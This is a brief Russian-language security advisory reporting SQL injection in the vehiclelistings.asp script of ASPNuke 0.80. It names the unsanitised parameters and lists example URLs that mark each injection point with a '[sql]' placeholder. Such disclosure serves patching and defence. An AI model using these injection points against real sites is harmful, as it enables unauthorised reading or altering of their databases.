Программа: ASPNuke 0.80

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "vehicleID", "categoryID_list", "sale_type", "stock_number", "manufacturer", "model", "year", "vin" и "listing_price" сценарием vehiclelistings.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

http://site.com/vehiclelistings.asp?vehicleID='[sql]
http://site.com/vehiclelistings.asp?categoryID_list='[sql]
http://site.com/vehiclelistings.asp?sale_type='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number=&vehicleID='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model=&year='[sql]
http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_number=&vehicleID=&vin='[sql]
http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufacturer=&model=&year=&listing_price='[sql]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии